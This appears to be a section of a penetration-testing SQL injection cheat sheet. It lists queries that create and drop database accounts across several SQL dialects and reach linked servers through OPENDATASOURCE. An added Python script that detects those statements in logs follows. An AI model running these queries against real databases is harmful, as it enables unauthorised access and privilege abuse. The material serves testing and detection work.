Lateral Movement

Lateral movement allows a tester to gain access to different sets of functionality/data that don't explicitly require a more privileged user. Switching user accounts laterally will expose different information and could aid in compromising a more privileged user.

* Requires privileged user

| Description | Query |
| --- | --- |
| Create Users | `CREATE USER 'netspi'@'%' IDENTIFIED BY 'password'` |
| Drop User | `DROP USER netspi` |

Lateral Movement

| Description | Query |
| --- | --- |
| Create Users | `CREATE USER user IDENTIFIED by pass;` |
| Drop Users | `DROP USER user` |

Lateral Movement

* Requires privileged user

| Description | Query |
| --- | --- |
| Create Users | `EXEC sp_addlogin 'user', 'pass';` |
| Drop Users | `EXEC sp_droplogin 'user';` |
| Link crawling | https://blog.netspi.com/sql-server-link-crawling-powerupsql/ |
| Connect to remote database as current service (requires sysadmin) | `SELECT * FROM OPENDATASOURCE('SQLNCLI', 'Server=MSSQLSRV04\SQLSERVER2016;Trusted_Connection=yes;').master.dbo.sysdatabases` |
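
A defender-side check for the statements tabulated above, as an added example that is not part of the original page: it scans a database statement log for account creation, account removal and `OPENDATASOURCE` calls, and flags accounts that are created and then dropped within a short window. The log format (timestamp, session user, statement), the 30-minute window, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Patterns for the statement forms tabulated above; "acct" captures the account name.
PATTERNS = [
    ("create_account", re.compile(r"\bCREATE\s+USER\s+'?(?P<acct>[\w$#]+)'?", re.I)),
    ("create_account", re.compile(r"\bsp_addlogin\s+N?'(?P<acct>[^']+)'", re.I)),
    ("drop_account", re.compile(r"\bDROP\s+USER\s+(?:IF\s+EXISTS\s+)?'?(?P<acct>[\w$#]+)'?", re.I)),
    ("drop_account", re.compile(r"\bsp_droplogin\s+N?'(?P<acct>[^']+)'", re.I)),
    ("remote_query", re.compile(r"\bOPENDATASOURCE\s*\(", re.I)),
]

# Constructed sample log (assumed format: ISO timestamp, session user, statement).
SAMPLE_LOG = [
    "2023-05-01T10:00:00 webapp SELECT name FROM products WHERE id = 7",
    "2023-05-01T10:02:10 webapp CREATE USER 'netspi'@'%' IDENTIFIED BY 'password'",
    "2023-05-01T10:05:00 webapp EXEC sp_addlogin 'user', 'pass';",
    "2023-05-01T10:09:30 webapp SELECT * FROM OPENDATASOURCE('SQLNCLI', "
    "'Server=MSSQLSRV04\\SQLSERVER2016;Trusted_Connection=yes;').master.dbo.sysdatabases",
    "2023-05-01T10:20:00 webapp DROP USER netspi",
]

def classify(statement):
    """Return (event, account) for the first matching pattern, else None."""
    for event, rx in PATTERNS:
        m = rx.search(statement)
        if m:
            return event, m.groupdict().get("acct")
    return None

def scan(lines, window=timedelta(minutes=30)):
    """Return one finding per matched statement, plus a 'short_lived_account'
    finding when an account is dropped within `window` of its creation."""
    findings, created = [], {}
    for line in lines:
        ts_raw, actor, statement = line.split(" ", 2)
        hit = classify(statement)
        if hit is None:
            continue
        event, acct = hit
        ts = datetime.fromisoformat(ts_raw)
        findings.append((event, actor, acct))
        key = acct.lower() if acct else None
        if event == "create_account":
            created[key] = ts
        elif event == "drop_account" and key in created and ts - created.pop(key) <= window:
            findings.append(("short_lived_account", actor, acct))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
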

© 2023 Copyright by NetSPI. All rights reserved.